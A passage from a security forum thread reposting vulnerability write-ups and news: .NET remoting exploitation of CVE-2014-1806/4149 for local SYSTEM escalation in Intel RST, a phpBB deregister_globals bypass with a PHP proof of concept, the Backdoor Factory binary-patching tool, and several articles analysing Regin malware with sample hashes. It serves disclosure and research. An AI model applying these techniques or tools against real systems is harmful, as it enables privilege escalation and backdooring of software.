client. So now for the bug, it turns out that nothing checked that the result of the deserialization was a local object. Could we instead insert a remote IMethodCallMessage object into the serialized stream? It turns out yes we can. Serializing an object which implements the interface but also derived from MarshalByRefObject serializes an instance of an ObjRef class which points back to the client. But why would this be useful? Well it turns out there's a Time-of-Check Time-of-Use vulnerability if an attacker could return different results for the MethodBase property. By returning a MethodBase for Object.ToString (which is always allowed) as some points it will trick the server into dispatching the call. Now once the StackBuilder sink goes to dispatch the method we replace it with something more dangerous, say Process.Start instead. And you've just got arbitrary code to execute in the remoting service. In order to actually exploit this you pretty much need to implement most of the remoting code manually, fortunately it is documented so that doesn't take very long. You can repurpose the existing .NET BinaryFormatter code to do most of the other work for you. I'd recommand taking a look at the github project for more information on how this all works. So that was CVE-2014-1806, but what about CVE-2014-4149? Well it's the same bug, MS didn't fix the TOCTOU issue, instead they added a call to RemotingServices.IsTransparentProxy just after the deserialization. Unfortunately that isn't the only way you can get a remote object from deserialization. .NET supports quite extensive COM Interop and as luck would have it all the IMessage interfaces are COM accessible. So instead of a remoting object we instead inject a COM implementation of the IMethodCallMessage interface (which ironically can be written in .NET anyway). This works best locally as they you don't need to worry so much about COM authentication but it should work remotely. The final fix was to check if the object returned is an instance of MarshalByRefObject, as it turns out that the transparent COM object, System.__ComObject is derived from that class as well as transparent proxies. Of course if the service is running with a TypeFilterLevel set to Full then even with these fixes the service can still be vulnerable. In this case you can deserialize anything you like in the initial remoting request to the server. Then using reflecting object tricks you can capture FileInfo or DirectoryInfo objects which give access to the filesystem at the privileges of the server. The reason you can do this is these objects are both serializable and derive from MarshalByRefObject. So you can send them to the server serialized, but when the server tries to reflect them back to the client it ends up staying in the server as a remote object. Real-World Example Okay let's see this in action in a real world application. I bought a computer a few years back which had pre-installed the Intel Rapid Storage Technology drivers version 11.0.0.1032 (the specific version can be downloaded here). This contains a vulnerable .NET remoting server which we can exploit locally to get local system privileges. A note before I continue, from what I can tell the latest versions of these drivers no longer uses .NET remoting for the communication between the user client and the server so I've never contacted Intel about the issue. That said there's no automatic update process so if, like me you had the original insecure version installed well you have a trivial local privilege escalation on your machine Bringing up Reflector and opening the IAStorDataMgrSvc.exe application (which is the local service) we can find the server side of the remoting code below: public void Start() { BinaryServerFormatterSinkProvider serverSinkProvider new BinaryServerFormatterSinkProvider { TypeFilterLevel = TypeFilterLevel.Full }; BinaryClientFormatterSinkProvider clientSinkProvider = new BinaryClientFormatterSinkProvider(); IdentityReferenceCollection groups = new IdentityReferenceCollection(); IDictionary properties = new Hashtable(); properties["portName"] = "ServerChannel"; properties["includeVersions"] = "false"; mChannel = new IpcChannel(properties, clientSinkProvider, serverSinkProvider); ChannelServices.RegisterChannel(mChannel, true); mServerRemotingRef = RemotingServices.Marshal(mServer, "Server.rem", typeof(IServer)); mEngine.Start(); } So there's a few thing to note about this code, it is using IpcChannel so it's going over named pipes (reasonable for a local service). It's setting the portName to ServerChannel, this is the name of the named pipe on the local system. It then registers the channel with the secure flag set to True and finally it configures an object with the known name of Server.rem which will be exposed on the channel. Also worth nothing it is setting the TypeFilterLevel to Full, we'll get back to that in a minute. For exploitation purposes therefore we can build the service URL as ipc://ServerChannel/Server.rem. So let's try sending it a command. In this case I had updated for the fix to CVE-2014-1806 but not for CVE-2014-4149 so we need to pass the -usecom flag to use a COM return channel. Well that was easy, direct code execution at local system privileges. But of course if we now update to the latest version it will stop working again. Fortunately though I highlighted that they were setting the TypeFilterLevel to Full. This means we can still attack it using arbitrary deserialization. So let's try and do that instead: In this case we know the service's directory and can upload our custom remoting server to the same directory the server executes from. This allows us to get full access to the system. Of course if we don't know where the server is we can still use the -useser flag to list and modify the file system (with the privileges of the server) so it might still be possible to exploit even if we don't know where the server is running from. Mitigating Against Attacks I can't be 100% certain there aren't other ways of exploiting this sort of bug, at the least I can't rule out bypassing the TypeFilterLevel stuff through one trick or another. Still there are definitely a few ways of mitigating it. One is to not use remoting, MS has deprecated the technology for WCF, but it isn't getting rid of it yet. If you have to use remoting you could use secure mode with user account checking. Also if you have complete control over the environment you could randomise the service name per-deployment which would at least prevent mass exploitation. An outbound firewall would also come in handy to block outgoing back channels. Posted by tiraniddo at 15:14 Sursa: Tyranid's Lair: Stupid is as Stupid Does When It Comes to .NET Remoting
  8. phpBB <= 3.1.1 deregister_globals() Function Bypass phpBB <= 3.1.1 deregister_globals() Function Bypass Taoguang Chen <[@chtg](http://github.com/chtg)> - 2014.11.18 When PHP's register_globals configuration directive set on, phpBB will call deregister_globals() function, all global variables registered by PHP will be destroyed. But deregister_globals() functions can be bypassed. ``` $input = array_merge( array_keys($_GET), array_keys($_POST), array_keys($_COOKIE), array_keys($_SERVER), array_keys($_SESSION), array_keys($_ENV), array_keys($_FILES) ); foreach ($input as $varname) { if (isset($not_unset[$varname])) { if ($varname !== 'GLOBALS' || isset($_GET['GLOBALS']) || isset($_POST['GLOBALS']) || isset($_SERVER['GLOBALS']) || isset($_SESSION['GLOBALS']) || isset($_ENV['GLOBALS']) || isset($_FILES['GLOBALS'])) { exit; } else { $cookie = &$_COOKIE; while (isset($cookie['GLOBALS'])) { if (!is_array($cookie['GLOBALS'])) { break; } .... } } unset($GLOBALS[$varname]); } ``` In the above code we see, when request $_COOKIE['GLOBALS'] = 1, $GLOBALS['GLOBALS'] will be destroyed by unset(). This means $GLOBALS array will be destroyed. This also means you will not be able to use $GLOBALS['key'] to access or control a global variable in all scopes throughout a script. Because the binding between the $GLOBALS array and the global symbol table has been broken. All global variables registered by PHP form $_COOKIE, $_SERVER, $_SESSION, $_ENV, and $_FILES arrays will be not unregistered. Proof of Concept ``` $_COOKIE['GLOBALS'] = 1; $_COOKIE['ryat'] = $ryat = 'ryat'; deregister_globals(); var_dump($GLOBALS); var_dump($ryat); $GLOBALS['ryat'] = 'hi'; var_dump($GLOBALS); var_dump($ryat); ``` P.S. I had reported the issue to the phpBB developers, but they do not consider this a security issue. Sursa: http://80vul.com/phpbb/vul.txt
  9. [h=2]The Backdoor Factory (BDF)[/h] For security professionals and researchers only. The goal of BDF is to patch executable binaries with user desired shellcode and continue normal execution of the prepatched state. DerbyCon 2014 Presentation: Contact the developer on: IRC: irc.freenode.net #BDFactory Twitter: @Midnite_runr Under a BSD 3 Clause License See the wiki: https://github.com/secretsquirrel/the-backdoor-factory/wiki Dependences: Capstone, using the 'next' repo until it is the 'master' repo: https://github.com/aquynh/capstone/tree/next Pefile, most recent: https://code.google.com/p/pefile/ INSTALL: ./install.sh This will install Capstone with the 'next' repo and use pip to install pefile. UPDATE: ./update.sh Supporting: Windows PE x86/x64,ELF x86/x64 (System V, FreeBSD, ARM Little Endian x32), and Mach-O x86/x64 and those formats in FAT files Packed Files: PE UPX x86/x64 Experimental: OpenBSD x32 Some executables have built in protections, as such this will not work on all binaries. It is advisable that you test target binaries before deploying them to clients or using them in exercises. I'm on the verge of bypassing NSIS, so bypassing these checks will be included in the future. Many thanks to Ryan O'Neill --ryan 'at' codeslum <d ot> org-- Without him, I would still be trying to do stupid things with the elf format. Also thanks to Silvio Cesare with his 1998 paper (Silvio Cesare 'Unix ELF parasites and virus' (VX heaven)) which these ELF patching techniques are based on. From DerbyCon: Video: Injection Module Demo: Slides: Patching Windows Executables with the Backdoor Factory | DerbyCon 2013 Sursa: https://github.com/secretsquirrel/the-backdoor-factory
  10. Regin: Giving IT security reason to hope NSA is waaaay ahead on malware Computerworld | Nov 24, 2014 11:20 AM PT Security pros don't need screaming headlines to put them on alert about a dangerous new piece of malware."New" and "present" are usually enough to do it, though "stealthy" and "nasty" will open their eyes a little wider. So think what the impact would be of this snippet about a new bit of malware called Regin that Symantec Corp. announced over the weekend: "In the world of malware threats, only a few rare examples can truly be considered groundbreaking and almost peerless," reads the opening sentence of Symantec's white paper on Regin." What we have seen in Regin is just such a class of malware." The phrase "class of malware," in this case referred to the sophistication level of the software, not its origin or intent – which appears to be long-term corporate and political espionage committed by a major national intelligence agency. Regin's architecture is so complex and programming so sophisticated, Symantec researchers concluded, that it is most likely to have been developed by a state-sponsored intelligence agency like the NSA or CIA, rather than hackers or malware writers motivated by profit or commercial developers such as the Italian company Hacking Team that sell software designed for espionage to governments and law enforcement agencies worldwide. Far more important than the polish or architecture on the newly discovered malware, however, is the consistency in targets and approach, which are similar to those of previously identified apps designed for international espionage and sabotage including Stuxnet, Duqu, Flamer, Red October and Weevil – all of which have been blamed on the U.S. National Security Agency or CIA, though only Stuxnet has been confirmed to have been developed by the U.S "Its capabilities and the level of resources behind Regin indicate that it is one of the main cyber-espionage tools used by a nation state," according to Symantec's report, which did not suggest which state might have been responsible. But who? "The best clues we have are where the infections have occurred and where they have not," Symantec researcher Liam O'Murchu told Re/Code in an interview yesterday. There have been no Regin attacks on either China or the U.S. Russia was the target of 28 percent of attacks; Saudi Arabia (a U.S. ally with which relations are often tense) was the target of 24 percent of Regin attacks. Mexico and Ireland each netted 9 percent of attacks. India, Afghanistan, Iran, Belgium, Austria and Pakistan got 5 percent apiece, according to Symantec's breakdown. Nearly half of attacks were aimed at "private individuals and small businesses;" telecom and Internet backbone companies were the target of 28 percent of attacks, though they likely served only as a way for Regin to get to businesses it had actually targeted, O'Murchu told Re/Code. "It looks like it comes from a Western organization," Symantec researcher Sian John told the BBC. "It's the level of skill and expertise, the length of time over which it was developed." The approach of Regin resembles Stuxnet less than it does Duqu, a sly, shape-shifting Trojan designed to "steal everything" according to a 2012 Kaspersky Lab analysis. One consistent feature that led to John's conclusion is the hide-and-stay-resident design of Regin, which is consistent for an organization wanting to monitor an infected organization for years rather than penetrate, grab a few files and move on to the next target – a pattern that is more consistent with the approach of the known cyberspy organizations of China's military than with that of the U.S. Stuxnet and Duqu showed obvious similarities in design China's cyberespionage style is much more smash-and-grab, according to security firm FireEye, Inc., whose 2013 report "APT 1: Exposing One of China's Cyber Espionage Units" detailed a persistent pattern of attack using malware and spear phishing that allowed one unit of the People's Liberation Army to steal "hundreds of terabytes of data from at least 141 organizations." It's unlikely the incredibly obvious attacks of PLA Unit 61398 – five of whose officers were the subject of an unprecedented espionage indictment of active-duty members of a foreign military by the U.S. Department of Justice earlier this year – are the only cyberspies in China, or that its lack of subtlety is characteristic of all Chinese cyberespionage efforts. Though its efforts at cyberespionage are less well known than those of either the U.S. or China, Russia has a healthy cyber-spy and malware-producing operation of its own. Malware known as APT28 has been traced to "a government sponsor based in Moscow," according to an October, 2014 report from FireEye. The report described APT28 as "collecting intelligence that would be useful to a government," meaning data on foreign militaries, governments and security organizations, especially those of former Soviet Bloc countries and NATO installations. The important thing about Regin – at least to corporate infosecurity people – is that the risk that it will be used to attack any U.S.-based corporation is low. The important thing to everyone else is that Regin is another bit of evidence of an ongoing cyberwar among the big three superpowers and a dozen or so secondary players, all of whom want to demonstrate they've got game online, none of which want a demonstration so extravagant it will expose all their cyber powers or prompt a physical attack in response to a digital one. It also pushes the envelope of what we knew was possible from a bit of malware whose primary goal is to remain undetected so it can spy for a long time. The ways it accomplishes that are easily clever enough to inspire admiration of its technical accomplishments – but only from those who don't have to worry about having to detect, fight or eradicate malware that qualifies for the same league and Regin and Stuxnet and Duqu, but plays for another team. Sursa: Regin: Giving IT security reason to hope NSA is waaaay ahead on malware | Computerworld
  11. Highly advanced backdoor trojan cased high-profile targets for years "Backdoor Regin" bears a resemblance to Stuxnet, was developed by a wealthy nation. by Dan Goodin - Nov 23 2014, 7:01pm GTBST Enlarge / The five stages of Regin. Symantec Researchers have unearthed highly advanced malware they believe was developed by a wealthy nation-state to spy on a wide range of international targets in diverse industries, including hospitality, energy, airline, and research. Backdoor Regin, as researchers at security firm Symantec are referring to the trojan, bears some resemblance to previously discovered state-sponsored malware, including the espionage trojans known as Flame and Duqu, as well as Stuxnet, the computer worm and trojan that was programmed to disrupt Iran's nuclear program. Regin likely required months or years to be completed and contains dozens of individual modules that allowed its operators to tailor the malware to individual targets. To remain stealthy, the malware is organized into five stages, each of which is encrypted except for the first one. Executing the first stage triggers a domino chain in which the second stage is decrypted and executed, and that in turn decrypts the third stage, and so on. Analyzing and understanding the malware requires researchers to acquire all five stages. Regin contains dozens of payloads, including code for capturing screenshots, seizing control of an infected computer's mouse, stealing passwords, monitoring network traffic, and recovering deleted files. Other modules appear to be tailored to specific targets. One such payload included code for monitoring the traffic of a Microsoft IIS server. Another sniffed the traffic of mobile telephone base station controllers. Symantec researchers believe Regin was a sprawling framework that was used in multiple campaigns that data back to 2008 and possibly several years earlier. Liam O'Murchu, manager of operations for Symantec Security Response, told Ars that the roster of modules used against one target was often unique, an indication that Regin was used in multiple campaigns. "Essentially, what we think we're looking at is different campaigns where in one infection they needed to sniff your keyboard whereas in another infection they wanted grab the user name and password of the admin connected to a base station controller," O'Murchu said. While almost half of the computers known to be infected by Regin were inside Internet service providers, Symantec believes they were attacked so the operators could spy on specific customers who used the ISPs. Similarly, telecommunication backbone providers, which at 28 percent accounted for the second biggest category of infected computers, were likely chosen so attackers could gain access to calls being routed through their infrastructure. There is still much Symantec doesn't know about Regin. So far, company researchers are aware of only about 100 infections, a number that seems small for such a sprawling framework of malware. The researchers have yet to uncover the command and control system the attackers used to communicate with infected computers, and they still don't have any educated hunches about the country behind the malware. The malware is known to have been active from 2008 until 2011, when it was abruptly pulled by its operators for unknown reasons. Regin, which is the name Microsoft assigned to the underlying trojan, resurfaced in 2013. Symantec researchers became aware of the malware in December of that year. Sursa: Highly advanced backdoor trojan cased high-profile targets for years | Ars Technica
  12. UK, US behind Regin malware, attacked European Union networks Summary: Two governments working together are said to have developed the state-sponsored malware that attacked the European Union. Guess what? One of the makers was an EU country. By Zack Whittaker for Zero Day | November 24, 2014 -- 18:12 GMT (10:12 PST) Blame the British and American spy agencies for the latest state-sponsored malware attack, say reporters at The Intercept. The publication, which in the wake of Glenn Greenwald's departure from The Guardian continued to publish documents leaked by Edward Snowden, said on Monday the recently discovered malware, known as Regin, was used against targets in the European Union. One of those targets included Belgian telecommunications company Belgacom, which had its networks broken into by the British spy agency the Government Communications Headquarters (GCHQ). Regin was first publicly talked about over the weekend after Symantec discovered the "sophisticated" malware, though is understood to have been in circulation since 2008. Compared to Stuxnet, the state-sponsored malware whose creators have never been confirmed, the recently-discovered trojan steals data from machines and networks it infects, disguised as Microsoft software. Some began to point the finger at Russia and China, but these were quickly discounted by industry experts. Others suspected the U.S. and Israel — a deal already exists that allows the Middle Eastern allied state to access raw and "unchecked" U.S. collected intelligence. They weren't far off. According to Monday's report, the U.S. working in conjunction with Britain, a European member state (though perhaps not for much longer) attacked Belgacom using the Regin malware. Though the Belgacom hack was disclosed by Snowden's leaks, the malware used had never been revealed. The new details from The Intercept show how GCHQ embarked upon its "hacking mission," known as Operation Socialist, by accessing Belgacom's networks in 2010. By targeting engineers through a faked LinkedIn page, GCHQ was able to get deep inside the Internet provider to steal data. One of Belgacom's main clients was the European Commission, the European Parliament, and the European Council of member state leaders. Exactly how member states of the European Union — there are 28 of them including the U.K. — will react to one of its own member states launching a successful hacking attack against their executive body, remains unknown. But while members of the Parliament and Commission staff have, over the years, seen the U.S. as one of the greatest threats to the region's data protection and privacy policies, they should have been looking a little closer to home. Sursa: UK, US behind Regin malware, attacked European Union networks | ZDNet
  13. Secret Malware in European Union Attack Linked to U.S. and British Intelligence By Morgan Marquis-Boire, Claudio Guarnieri, and Ryan Gallagher Complex malware known as Regin is the suspected technology behind sophisticated cyberattacks conducted by U.S. and British intelligence agencies on the European Union and a Belgian telecommunications company, according to security industry sources and technical analysis conducted by The Intercept. Regin was found on infected internal computer systems and email servers at Belgacom, a partly state-owned Belgian phone and internet provider, following reports last year that the company was targeted in a top-secret surveillance operation carried out by British spy agency Government Communications Headquarters, industry sources told The Intercept. The malware, which steals data from infected systems and disguises itself as legitimate Microsoft software, has also been identified on the same European Union computer systems that were targeted for surveillance by the National Security Agency. The hacking operations against Belgacom and the European Union were first revealed last year through documents leaked by NSA whistleblower Edward Snowden. The specific malware used in the attacks has never been disclosed, however. The Regin malware, whose existence was first reported by the security firm Symantec on Sunday, is among the most sophisticated ever discovered by researchers. Symantec compared Regin to Stuxnet, a state-sponsored malware program developed by the U.S. and Israel to sabotage computers at an Iranian nuclear facility. Sources familiar with internal investigations at Belgacom and the European Union have confirmed to The Intercept that the Regin malware was found on their systems after they were compromised, linking the spy tool to the secret GCHQ and NSA operations. Ronald Prins, a security expert whose company Fox IT was hired to remove the malware from Belgacom’s networks, told The Intercept that it was “the most sophisticated malware” he had ever studied. “Having analyzed this malware and looked at the [previously published] Snowden documents,” Prins said, “I’m convinced Regin is used by British and American intelligence services.” A spokesman for Belgacom declined to comment specifically about the Regin revelations, but said that the company had shared “every element about the attack” with a federal prosecutor in Belgium who is conducting a criminal investigation into the intrusion. “It’s impossible for us to comment on this,” said Jan Margot, a spokesman for Belgacom. “It’s always been clear to us the malware was highly sophisticated, but ever since the clean-up this whole story belongs to the past for us.” In a hacking mission codenamed Operation Socialist, GCHQ gained access to Belgacom’s internal systems in 2010 by targeting engineers at the company. The agency secretly installed so-called malware “implants” on the employees’ computers by sending their internet connection to a fake LinkedIn page. The malicious LinkedIn page launched a malware attack, infecting the employees’ computers and giving the spies total control of their systems, allowing GCHQ to get deep inside Belgacom’s networks to steal data. The implants allowed GCHQ to conduct surveillance of internal Belgacom company communications and gave British spies the ability to gather data from the company’s network and customers, which include the European Commission, the European Parliament, and the European Council. The software implants used in this case were part of the suite of malware now known as Regin. One of the keys to Regin is its stealth: To avoid detection and frustrate analysis, malware used in such operations frequently adhere to a modular design. This involves the deployment of the malware in stages, making it more difficult to analyze and mitigating certain risks of being caught. Based on an analysis of the malware samples, Regin appears to have been developed over the course of more than a decade; The Intercept has identified traces of its components dating back as far as 2003. Regin was mentioned at a recent Hack.lu conference in Luxembourg, and Symantec’s report on Sunday said the firm had identified Regin on infected systems operated by private companies, government entities, and research institutes in countries such as Russia, Saudi Arabia, Mexico, Ireland, Belgium, and Iran. The use of hacking techniques and malware in state-sponsored espionage has been publicly documented over the last few years: China has been linked to extensive cyber espionage, and recently the Russian government was also alleged to have been behind a cyber attack on the White House. Regin further demonstrates that Western intelligence agencies are also involved in covert cyberespionage. GCHQ declined to comment for this story. The agency issued its standard response to inquiries, saying that “it is longstanding policy that we do not comment on intelligence matters” and “all of GCHQ’s work is carried out in accordance with a strict legal and policy framework, which ensures that our activities are authorised, necessary and proportionate.” The NSA said in a statement, “We are not going to comment on The Intercept’s speculation.” The Intercept has obtained samples of the malware from sources in the security community and is making it available for public download in an effort to encourage further research and analysis. (To download the malware, click here. The file is encrypted; to access it on your machine use the password “infected.”) What follows is a brief technical analysis of Regin conducted by The Intercept’s computer security staff. Regin is an extremely complex, multi-faceted piece of work and this is by no means a definitive analysis. In the coming weeks, The Intercept will publish more details about Regin and the infiltration of Belgacom as part of an investigation in partnership with Belgian and Dutch newspapers De Standaard and NRC Handelsblad. Origin of Regin In Nordic mythology, the name Regin is associated with a violent dwarf who is corrupted by greed. It is unclear how the Regin malware first got its name, but the name appeared for the first time on the VirusTotal website on March 9th 2011. Der Spiegel reported that, according to Snowden documents, the computer networks of the European Union were infiltrated by the NSA in the months before the first discovery of Regin. Industry sources familiar with the European Parliament intrusion told The Intercept that such attacks were conducted through the use of Regin and provided samples of its code. This discovery, the sources said, may have been what brought Regin to the wider attention of security vendors. Also on March 9th 2011, Microsoft added related entries to its Malware Encyclopedia: Alert level: Severe First detected by definition: 1.99.894.0 Latest detected by definition: 1.173.2181.0 and higher First detected on: Mar 09, 2011 This entry was first published on: Mar 09, 2011 This entry was updated on: Not available Two more variants of Regin have been added to the Encyclopedia, Regin.B and Regin.C. Microsoft appears to detect the 64-bit variants of Regin as Prax.A and Prax.B. None of the Regin/Prax entries are provided with any sort of summary or technical information. The following Regin components have been identified: Loaders The first stage are drivers which act as loaders for a second stage. They have an encrypted block which points to the location of the 2nd stage payload. On NTFS, that is an Extended Attribute Stream; on FAT, they use the registry to store the body. When started, this stage simply loads and executes Stage 2. The Regin loaders that are disguised as Microsoft drivers with names such as: serial.sys cdaudio.sys atdisk.sys parclass.sys usbclass.sys Mimicking Microsoft drivers allows the loaders to better disguise their presence on the system and appear less suspicious to host intrusion detection systems. Second stage loader When launched, it cleans traces of the initial loader, loads the next part of the toolkit and monitors its execution. On failure, Stage 2 is able to disinfect the compromised device. The malware zeroes out its PE (Portable Executable, the Windows executable format) headers in memory, replacing “MZ” with its own magic marker 0xfedcbafe. Orchestrator This component consists of a service orchestrator working in Windows’ kernel. It initializes the core components of the architecture and loads the next parts of the malware. Information Harvesters This stage is composed of a service orchestrator located in user land, provided with many modules which are loaded dynamically as needed. These modules can include data collectors, a self-defense engine which detects if attempts to detect the toolkit occur, functionality for encrypted communications, network capture programs, and remote controllers of different kinds. Stealth Implant The Intercept’s investigation revealed a sample uploaded on VirusTotal on March 14th 2012 that presents the unique 0xfedcbafe header, which is a sign that it might have been loaded by a Regin driver and it appears to provide stealth functionality for the tool kit. This picture shows the very first bytes of the sample in question, showing the unique 0xfedcbafe header at the beginning. In order to access information stored in the computer’s memory, programs use objects that reference specific locations in memory called pointers. This binary file contains some of such pointers initialized, which corroborates the hypothesis that the file was dumped from memory during a forensic analysis of a compromised system. The sample has the following SHA256 hash: fe1419e9dde6d479bd7cda27edd39fafdab2668d498931931a2769b370727129 This sample gives a sense of the sophistication of the actors and the length of the precautions they have been taking in order to operate as stealthily as possible. When a Windows kernel driver needs to allocate memory to store some type of data, it creates so called kernel pools. Such memory allocations have specific headers and tags that are used to identify the type of objects contained within the block. For example such tags could be Proc, Thrd or File, which respectively indicate that the given block would contain a process, thread or file object structure. When performing forensic analysis of a computer’s memory, it is common to use a technique called pool scanning to parse the kernel memory, enumerate such kernel pools, identify the type of content and extract it. Just like Regin loader drivers, this driver repeatedly uses the generic “Ddk “ tag with ExAllocatePoolWithTag() when allocating all kernel pools: This picture shows the use of the “ddk “ tag when allocating memory with the Windows ExAllocatePoolWIthTag() function. The generic tag which is used throughout the operating system when a proper tag is not specified. This makes it more difficult for forensic analysts to find any useful information when doing pool scanning, since all its memory allocations will mix with many generic others. In addition, when freeing memory using ExFreePool(), the driver zeroes the content, probably to avoid leaving traces in pool memory. The driver also contains routines to check for specific builds of the Windows kernel in use, including very old versions such as for Windows NT4 Terminal Server and Windows 2000, and then adapts its behavior accordingly. Windows kernel drivers operate on different levels of priority, from the lowest PASSIVE_LEVEL to the highest HIGH_LEVEL. This level is used by the processor to know what service give execution priority to and to make sure that the system doesn’t try to allocate used resources which could result in a crash. This Regin driver recurrently checks that the current IRQL (Interrupt Request Level) is set to PASSIVE_LEVEL using the KeGetCurrentIrql() function in many parts of the code, probably in order to operate as silently as possible and to prevent possible IRQL confusion. This technique is another example of the level of precaution the developers took while designing this malware framework. Upon execution of the unload routine (located at 0xFDEFA04A), the driver performs a long sequence of steps to remove remaining traces and artifacts. Belgacom Sample In an interview given to the Belgian magazine MondiaalNiews, Fabrice Clément, head of security of Belgacom, said that the company first identified the attack on June 21, 2013. In the same interview Clément says that the computers targeted by the attackers included staff workstations as well as email servers. These statements confirm the timing and techniques used in the attack. From previously identified Regin samples, The Intercept developed unique signatures which could identify this toolkit. A zip archive with a sample identified as Regin/Prax was found in VirusTotal, a free, online website which allows people to submit files to be scanned by several anti-virus products. The zip archive was submitted on 2013-06-21 07:58:37 UTC from Belgium, the date identified by Clément. Sources familiar with the Belgacom intrusion told The Intercept that this sample was uploaded by a systems administrator at the company, who discovered the malware and uploaded it in an attempt to research what type of malware it was. The archive contains: Along with other files The Intercept found the output of a forensic tool, GetThis, which is being run on target systems looking for malware. From the content of the GetThis.log file, we can see that a sample called “svcsstat.exe” and located in C:\Windows\System32\ was collected and a copy of it was stored. The malware in question is “0001000000000C1C_svcsstat.exe_sample ”. This is a 64bit variant of the first stage Regin loader aforementioned. The archive also contains the output of ProcMon, “Process Monitor”, a system monitoring tool distributed by Microsoft and commonly used in forensics and intrusion analysis. This file identifies the infected system and provides a variety of interesting information about the network. For instance: USERDNSDOMAIN=BGC.NET USERDOMAIN=BELGACOM USERNAME=id051897a USERPROFILE=C:\Users\id051897a The following environment variable shows that the system was provided with a Microsoft SQL server and a Microsoft Exchange server, indicating that it might one of the compromised corporate mail server Fabrice Clément mentioned to Mondiaal News: Path=C:\Program Files\Legato\nsr\bin;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Network Monitor 3\;C:\Program Files\System Center Operations Manager 2007\;c:\Program Files (x86)\Microsoft SQL Server\90\Tools\binn\;D:\Program Files\Microsoft\Exchange Server\bin Below is a list of hashes for the files The Intercept is making available for download. Given that that it has been over a year since the Belgacom operation was publicly outed, The Intercept considers it likely that the GCHQ/NSA has replaced their toolkit and no current operations will be affected by the publication of these samples. Regin Samples 32-bit Loaders 20831e820af5f41353b5afab659f2ad42ec6df5d9692448872f3ed8bbb40ab92 7553d4a5914af58b23a9e0ce6a262cd230ed8bb2c30da3d42d26b295f9144ab7 f89549fc84a8d0f8617841c6aa4bb1678ea2b6081c1f7f74ab1aebd4db4176e4 fd92fd7d0f925ccc0b4cbb6b402e8b99b64fa6a4636d985d78e5507bd4cfecef 225e9596de85ca7b1025d6e444f6a01aa6507feef213f4d2e20da9e7d5d8e430 9cd5127ef31da0e8a4e36292f2af5a9ec1de3b294da367d7c05786fe2d5de44f b12c7d57507286bbbe36d7acf9b34c22c96606ffd904e3c23008399a4a50c047 f1d903251db466d35533c28e3c032b7212aa43c8d64ddf8c5521b43031e69e1e 4e39bc95e35323ab586d740725a1c8cbcde01fe453f7c4cac7cced9a26e42cc9 a0d82c3730bc41e267711480c8009883d1412b68977ab175421eabc34e4ef355 a7493fac96345a989b1a03772444075754a2ef11daa22a7600466adc1f69a669 5001793790939009355ba841610412e0f8d60ef5461f2ea272ccf4fd4c83b823 a6603f27c42648a857b8a1cbf301ed4f0877be75627f6bbe99c0bfd9dc4adb35 8d7be9ed64811ea7986d788a75cbc4ca166702c6ff68c33873270d7c6597f5db 40c46bcab9acc0d6d235491c01a66d4c6f35d884c19c6f410901af6d1e33513b df77132b5c192bd8d2d26b1ebb19853cf03b01d38afd5d382ce77e0d7219c18c 7d38eb24cf5644e090e45d5efa923aff0e69a600fb0ab627e8929bb485243926 a7e3ad8ea7edf1ca10b0e5b0d976675c3016e5933219f97e94900dea0d470abe a0e3c52a2c99c39b70155a9115a6c74ea79f8a68111190faa45a8fd1e50f8880 d42300fea6eddcb2f65ffec9e179e46d87d91affad55510279ecbb0250d7fdff 5c81cf8262f9a8b0e100d2a220f7119e54edfc10c4fb906ab7848a015cd12d90 b755ed82c908d92043d4ec3723611c6c5a7c162e78ac8065eb77993447368fce c0cf8e008fbfa0cb2c61d968057b4a077d62f64d7320769982d28107db370513 cca1850725f278587845cd19cbdf3dceb6f65790d11df950f17c5ff6beb18601 ecd7de3387b64b7dab9a7fb52e8aa65cb7ec9193f8eac6a7d79407a6a932ef69 e1ba03a10a40aab909b2ba58dcdfd378b4d264f1f4a554b669797bbb8c8ac902 392f32241cd3448c7a435935f2ff0d2cdc609dda81dd4946b1c977d25134e96e 9ddbe7e77cb5616025b92814d68adfc9c3e076dddbe29de6eb73701a172c3379 8389b0d3fb28a5f525742ca2bf80a81cf264c806f99ef684052439d6856bc7e7 32-bit Rootkit fe1419e9dde6d479bd7cda27edd39fafdab2668d498931931a2769b370727129 32-bit Orchestrator e420d0cf7a7983f78f5a15e6cb460e93c7603683ae6c41b27bf7f2fa34b2d935 4139149552b0322f2c5c993abccc0f0d1b38db4476189a9f9901ac0d57a656be 64-bit Loader (Belgacom) 4d6cebe37861ace885aa00046e2769b500084cc79750d2bf8c1e290a1c42aaff Photo credit: Winfried Rothermel/AP Sursa: https://firstlook.org/theintercept/2014/11/24/secret-regin-malware-belgacom-nsa-gchq/
  14. [h=1]Adrien de Beaupre - Making Pen-Testing Analysis Sexy[/h] n-PUPDQ0H&index=6Publicat pe 24 nov. 2014 This talk was recorded at BSides Winnipeg 2013. More information can be found at BSides Winnipeg 2013. This presentation will discuss information security penetration testing methodology, and how portions of the test process may be automated. The analysis of test results can be made more efficient through development of additional tools to assist the analyst. The Open Source Security Assessment Management System (OSSAMS) will be presented, which is a framework for the automation, data collection, analysis, and reporting in penetration testing and vulnerability assessment efforts. OSSAMS is written in Python and allows for the processing of tool results, parsing and normalizing the data, extraction of meaningful information via query, and more effective analysis. Adrien is a senior Information Security Consultant with Intru-Shun.ca Inc., experienced in penetration testing and incident response. He also holds the ISC2 CISSP, GXPN (GIAC Exploit Researcher and Advanced Penetration Tester), GWAPT (GIAC Web Application Penetration Tester), GPEN (GIAC Penetration Tester), GCIH (GIAC Certified Incident Handler), GCIA (GIAC Certified Intrusion Analyst), GSEC (GIAC Security Essentials), OPST (OSSTMM Professional Security Tester), and OPSA (OSSTMM Professional Security Analyst) certifications. As a volunteer member of the SANS Internet Storm Center (isc.sans.edu) he performs incident handling and threat analysis duties. When not geeking out Adrien can be found with his family, or at the dojo.
  15. [h=1]Michael Zapp - SSD Security Risks[/h] n-PUPDQ0H&index=7Publicat pe 24 nov. 2014 This talk was recorded at BSides Winnipeg 2013. More information can be found at BSides Winnipeg 2013. Solid state storage devices provide many performance improvements but they also change how data is managed at the physical layer. Those changes lead to new opportunities for the extraction of sensitive data. This talk will outline how SSDs work, how they are managed, how this can be exploited, and what we can do to mitigate the risks. Michael is a Senior Instructor in the Department of Computer Science at the University of Manitoba. In addition to being the best Computer Science instructor around (opinions may differ), he has developed a number of vehicular embedded systems, including transmission controllers and instrument clusters. Michael also developed a go kart engine controller that receives commands via a custom designed handheld device, over a radio protocol of his own design.
